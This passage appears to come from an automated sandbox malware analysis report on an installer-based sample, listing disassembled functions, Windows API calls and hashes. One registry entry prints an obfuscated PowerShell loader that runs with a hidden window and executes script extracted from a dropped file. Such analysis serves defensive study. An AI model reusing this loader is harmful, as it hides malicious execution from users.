Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 2b46cb1ea70d3002ff1e12295b5763c1d55ea381a2360d12b4260fd16352c354
Instruction ID: beb49624fd26f69101be82d244f2f6f966a121381cf6cbe5bc22d12f3c535a1a
Opcode Fuzzy Hash: 2b46cb1ea70d3002ff1e12295b5763c1d55ea381a2360d12b4260fd16352c354
Instruction Fuzzy Hash: A0F05E30601621ABC7317B64FE4CA8F7AA4AB18B12751047AF148B21F4CB7848C28BAC

Function 00405A26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00405FA0: lstrcpynA.KERNEL32(?,?,00000400,004032DE,Topfartens Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FAD

Part of subcall function 004059D1: CharNextA.USER32(?,?,0042BC78,?,00405A3D,0042BC78,0042BC78,74DF3410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059DF
Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059E4
Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059F8

lstrlenA.KERNEL32(0042BC78,00000000,0042BC78,0042BC78,74DF3410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A79
GetFileAttributesA.KERNEL32(0042BC78,0042BC78,0042BC78,0042BC78,0042BC78,0042BC78,00000000,0042BC78,0042BC78,74DF3410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 00405A89

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A26

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-3081826266
Opcode ID: fd356b8919337fe01a24efca68e850dbe45d0084ba8af47b2787d0181ceea021
Instruction ID: ffa0610acded3722bed2d7d96fb1c232a132fb9d66bc0fefd21ab2e8d06464ef
Opcode Fuzzy Hash: fd356b8919337fe01a24efca68e850dbe45d0084ba8af47b2787d0181ceea021
Instruction Fuzzy Hash: 4EF04C25305D6556C622723A1C89AAF1A04CED3324759073FF891F12D2DB3C8A439DBE

Function 0040503B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040506A
CallWindowProcA.USER32(?,?,?,?), ref: 004050BB

Part of subcall function 0040408B: SendMessageA.USER32(00010444,00000000,00000000,00000000), ref: 0040409D

Strings

, xrefs: 0040504B

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 2142c290a1f943eea3cbcd359024918697fc3eca74c4b32021e9b526f4e7b2b2
Instruction ID: 78b8b48c00cf9c642473ee3ff4bb8652c0e006dd03d895f02bd3b5106f733cf3
Opcode Fuzzy Hash: 2142c290a1f943eea3cbcd359024918697fc3eca74c4b32021e9b526f4e7b2b2
Instruction Fuzzy Hash: AA015E71200608AFDF205F11DD80A6F37A5EB84750F14443AFA41B51D1D73A8C929EAA

Function 00405E87 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Execute: ,?,?,?,?,00000002,Execute: ,?,004060CB,80000002), ref: 00405ECD
RegCloseKey.ADVAPI32(?,?,004060CB,80000002,Software\Microsoft\Windows\CurrentVersion,Execute: ,Execute: ,Execute: ,?,Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) "), ref: 00405ED8

Strings

Execute: , xrefs: 00405E8A, 00405EBE

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: CloseQueryValue
String ID: Execute:
API String ID: 3356406503-3756222843
Opcode ID: 81da800dade96896110552a5810a24f143c54bb094b4f61591ae75c107ad8ff5
Instruction ID: 161d8fcf8587aa93f0d987360409ed3ef12a8a36c24b5ed9f98f318b00ae4845
Opcode Fuzzy Hash: 81da800dade96896110552a5810a24f143c54bb094b4f61591ae75c107ad8ff5
Instruction Fuzzy Hash: E0015A72500609EBDF228F61CD09FDB3BA8EF55364F00402AFA95A2191D778DA54DBA4

Function 00403739 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,74DF3410,00000000,C:\Users\user\AppData\Local\Temp\,00403711,0040352B,?,?,00000006,00000008,0000000A), ref: 00403753
GlobalFree.KERNEL32(?), ref: 0040375A

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403739

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3081826266
Opcode ID: 6450b972aff65fe59d26657d82cdbaa5e3cda0ee416f3077b3e42c8154ca0fa8
Instruction ID: b24f28e728a59e08de23ecbb17507a5b71a11735b8e3b636be16efbcbefcbfb5
Opcode Fuzzy Hash: 6450b972aff65fe59d26657d82cdbaa5e3cda0ee416f3077b3e42c8154ca0fa8
Instruction Fuzzy Hash: F7E0127351212097C7217F69EE4875AB7A86F46F22F09507AE8447B26487745C428BDC

Function 0040597F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402DCF,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Amalgamers.exe,C:\Users\user\Desktop\Amalgamers.exe,80000000,00000003), ref: 00405985
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DCF,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Amalgamers.exe,C:\Users\user\Desktop\Amalgamers.exe,80000000,00000003), ref: 00405993

Strings

C:\Users\user\Desktop, xrefs: 0040597F

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
Instruction ID: ff79c929155de07913877b57a895d1bbe205444e8a13cf8e1c8c73a821d1827b
Opcode Fuzzy Hash: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
Instruction Fuzzy Hash: CDD0C7B3409E70AEF30353149D04B9FAA58DF16710F090466F580E6191C67C4D428BFD

Function 00405A9E Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAE
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405AC6
CharNextA.USER32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AD7
lstrlenA.KERNEL32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE0

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
Instruction ID: 2b94cf21fc0d9439dbab8b822db930a3447ea2d2cb1db815078a5a090280caf9
Opcode Fuzzy Hash: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
Instruction Fuzzy Hash: 6DF0C231201918AFCB02DBA8CD4099FBBA8EF06350B2540B9E841F7211D674EE01AFA9

Analysis Process: msiexec.exePID: 600, Parent PID: 6428COMMON

Executed Functions

Function 02CC4A58 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2875708023.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2cc0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a6207c2277e0f1abd160f1d26cc31658408a902f58f17eedc3a372f4b5df6f6
Instruction ID: e4aa9097df95c5664aac9554c608968b3a51f4749a3bfe71eb401db2007f8111
Opcode Fuzzy Hash: 8a6207c2277e0f1abd160f1d26cc31658408a902f58f17eedc3a372f4b5df6f6
Instruction Fuzzy Hash: 75B15E70E006098FDB28CFA9C9A57DDBBF2AF88314F24C12DD819E7254EB749945CB91

Function 02CC92F0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2875708023.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2cc0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21a59d0834f704d04244b604a4b3bde6831475a10f81cced90364c337d76f8b0
Instruction ID: 171acde7b17a374c2a457b4d5fd82a90fcb166941c9bca1396da81b80091896c
Opcode Fuzzy Hash: 21a59d0834f704d04244b604a4b3bde6831475a10f81cced90364c337d76f8b0
Instruction Fuzzy Hash: 67215331E006059BDF05CF65D4906AEF7B6BF85304F248629E809FB350DB70E946CB91

Function 02CC6E9A Relevance: 2.6, Strings: 2, Instructions: 147COMMON

Download Yara Rule

Strings

LR^q, xrefs: 02CC6ECE
LR^q, xrefs: 02CC6F67

Memory Dump Source

Source File: 00000006.00000002.2875708023.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2cc0000_msiexec.jbxd

Similarity

API ID:
String ID: LR^q$LR^q
API String ID: 0-4089051495
Opcode ID: 96657953df395c5f6da7170183df8e9cbed34ea8e7dc56836af8021b6e527c7f
Instruction ID: b6e0a7b4ba4f627587f3daeba46ecdd6dad59744b17460f98fedffdb0d002537
Opcode Fuzzy Hash: 96657953df395c5f6da7170183df8e9cbed34ea8e7dc56836af8021b6e527c7f
Instruction Fuzzy Hash: 0451D230E102099FDB15DFB9C85079EBBB6FFC5314F208469E405EB241EB759846CB91

Function 02CCF38D Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

PH^q, xrefs: 02CCF4DB

Memory Dump Source

Source File: 00000006.00000002.2875708023.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2cc0000_msiexec.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: d186abd27a82f9a94fa15aac8ce4ce98030abde095c21cdbc1fa1983022b214b
Instruction ID: 5a3deeae15dec0d5ae7c714359df3db3d634eb50980969e55c10b62ffc3fa91b
Opcode Fuzzy Hash: d186abd27a82f9a94fa15aac8ce4ce98030abde095c21cdbc1fa1983022b214b
Instruction Fuzzy Hash: 5E41FD30B002008FDB059B34C55476E7BA3ABC8248F24856ED00ADB394DF39DD42CBA2

Function 02CC6F38 Relevance: 1.4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

Strings

LR^q, xrefs: 02CC6F67

Memory Dump Source

Source File: 00000006.00000002.2875708023.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2cc0000_msiexec.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 324af7c6c5b202d62d66ca1058cde1b9c023459422710a12a23b6b0ee934d0c9
Instruction ID: d497f028ca7486e192a09e7f6ae25717f41aabf28da5a14176034a77b39723f7
Opcode Fuzzy Hash: 324af7c6c5b202d62d66ca1058cde1b9c023459422710a12a23b6b0ee934d0c9
Instruction Fuzzy Hash: CC318F30E102098BEB24CFA5D8447AEBBBAFFC5314F308569E506EB240E7759946CB41

Function 02CC7998 Relevance: .6, Instructions: 555COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2875708023.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2cc0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b24835d82c405c81bf6c92539c13ebebb68346babf6935c0353639287354895
Instruction ID: ae20ccb4eb90c83af090ec080188a00a8efc4420990a478bb08b43d7111c947b
Opcode Fuzzy Hash: 4b24835d82c405c81bf6c92539c13ebebb68346babf6935c0353639287354895
Instruction Fuzzy Hash: AB125030B002418FCB59AB28E594229B7A7EBC5355F2149BCE005EF354DF79ED8ADB81

Function 02CC93F4 Relevance: .4, Instructions: 375COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2875708023.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2cc0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71915afeaabbf77f31c33a401de71a105a71d46bcad7dd32bdb1179a56385760
Instruction ID: 3731963028edbdc3b37ebd8a6f60ed806ed28fbc2923beaeae3d27986ba74de6
Opcode Fuzzy Hash: 71915afeaabbf77f31c33a401de71a105a71d46bcad7dd32bdb1179a56385760
Instruction Fuzzy Hash: 3BD18F35B002058FDB14DF68D584AADB7B2EFC8314F248469E90AE7394DB35ED42CB91

Function 02CC9770 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2875708023.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2cc0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a127825421eaeea2089c8269a019bb67ff4641f17246299ec87b8949d6dbabd
Instruction ID: 7568041427c4fe07307dfd62f7ebb5d6fee3b3cde213d1bd0193cba570b8ae56
Opcode Fuzzy Hash: 2a127825421eaeea2089c8269a019bb67ff4641f17246299ec87b8949d6dbabd
Instruction Fuzzy Hash: F6A18B71A002058FDB14DFA9D8807AEBBB2FFC9314F20856AE909DB385D734D985CB91

Function 02CC4A4D Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2875708023.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2cc0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64c5ab6f26fbebfbc109ff0f55f54aa368620f2aa8a6e417e2d6831e01bc0a86
Instruction ID: d430ae58b80a0d60ed75927cb3c9bab3ce60e32398e756d0dbec98c14e4314f4
Opcode Fuzzy Hash: 64c5ab6f26fbebfbc109ff0f55f54aa368620f2aa8a6e417e2d6831e01bc0a86
Instruction Fuzzy Hash: 5EB15CB0E006098FDB24CFA9C9A57DDBBF1AF88314F24C12DD818E7254EB749985CB91

Function 02CC1838 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2875708023.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2cc0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6deb9c36f7535bb067f2671217ac54fdd0b795dd44aa0f6cecbc4d5c1fa5908f
Instruction ID: c2dfcc13d8ead9faed9c890060766b7aa07b8e8379e0873d653a6d60a7f6ed6b
Opcode Fuzzy Hash: 6deb9c36f7535bb067f2671217ac54fdd0b795dd44aa0f6cecbc4d5c1fa5908f
Instruction Fuzzy Hash: 3531BA31B042048FDB14DB36D9647AE77B2EF88218F24016DD50AEB391DB7A9D02CB92

Function 02CCF250 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2875708023.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2cc0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e15e69db5226952c4414e120dbbb90d6b89692b764098d2826ebc0f9c0a76435
Instruction ID: 86c6b362dffa9934ae1be7fc65cfacb110f7405f6f02edb821e84f9a2b3d39f2
Opcode Fuzzy Hash: e15e69db5226952c4414e120dbbb90d6b89692b764098d2826ebc0f9c0a76435
Instruction Fuzzy Hash: D4318335F006059BCF05CFA4D49469EB7B2BF88300F24856EE815E7754DB74E942CB90

Function 02CC269D Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2875708023.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2cc0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39815121c9600960ba682ec8a4b023f82754285957702beff95e22a7445c0518
Instruction ID: 2eb31dbee55f223e49e863c4db2ada2571d549d36004ad79f72c8598505393f1
Opcode Fuzzy Hash: 39815121c9600960ba682ec8a4b023f82754285957702beff95e22a7445c0518
Instruction Fuzzy Hash: 5241F0B1D00249DFDB10CFA9C584ADEBFB5EF48314F208029E809AB254DB35A945CF91

Function 02CCF260 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2875708023.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2cc0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6352bec4b63a71aeafbbc9d0e875701607fba7bf0e89f9fa19514c9d3caa003d
Instruction ID: 90d524fc597a937bb1dffd447b6272ff612561f8f274ecc8a17bc10c5fd29f7e
Opcode Fuzzy Hash: 6352bec4b63a71aeafbbc9d0e875701607fba7bf0e89f9fa19514c9d3caa003d
Instruction Fuzzy Hash: 54316F31E002069BCF04CFA4D59469EB7B2BF89300F24852EE80AE7754DB74E942CB90

Function 02CC26A8 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2875708023.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2cc0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b3c7d8b5eb0a7a48e977b8bc8b2479cfc30e38361ffb66db96d8b10513216c3
Instruction ID: c6d56b4f4cb129249f5f3cd8c605c11136f449d79dae77543503337940e0cad5
Opcode Fuzzy Hash: 2b3c7d8b5eb0a7a48e977b8bc8b2479cfc30e38361ffb66db96d8b10513216c3
Instruction Fuzzy Hash: E041DFB0D00349DFDB10DFA9C584ADEBFF5EF48314F24802AE819AB254DB75A945CB91

Function 02CC7051 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2875708023.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2cc0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a4b6e44b974c92ef27b910c15f4ec43a838eb622f378e656cfa31f1100cb1d1
Instruction ID: b7b651133d7453bb5c16a8abb9c77564305b30977c0874c72c273644c163f095
Opcode Fuzzy Hash: 2a4b6e44b974c92ef27b910c15f4ec43a838eb622f378e656cfa31f1100cb1d1
Instruction Fuzzy Hash: 51314F347002149FD759AB78D494A2E77BBEBC8704F20846CE50A9B3A8DF399C46CB42

Function 02CC92E1 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2875708023.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2cc0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b25fb491fb39aa9df02ad82c8f9a42c7b0fb467869b5926d099f539a2faa4c9a
Instruction ID: 245a5d4304d33e1c7af6e16347fe146c358e32a73cbfc6ab8aba1b6d481980fa
Opcode Fuzzy Hash: b25fb491fb39aa9df02ad82c8f9a42c7b0fb467869b5926d099f539a2faa4c9a
Instruction Fuzzy Hash: 3D313231E106069BDB15CF65D4906AEF7B2BF85304F288669E405EB250DB70E946CB91

Function 02CC1340 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2875708023.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2cc0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f51ec0133552f7d837cb0453649a971f03a6884986870ddcd1e5f66274fb152d
Instruction ID: 14752a988ebfc908efcbe8e6f4d59a4746a31982e15651df5a9b260101327ea5
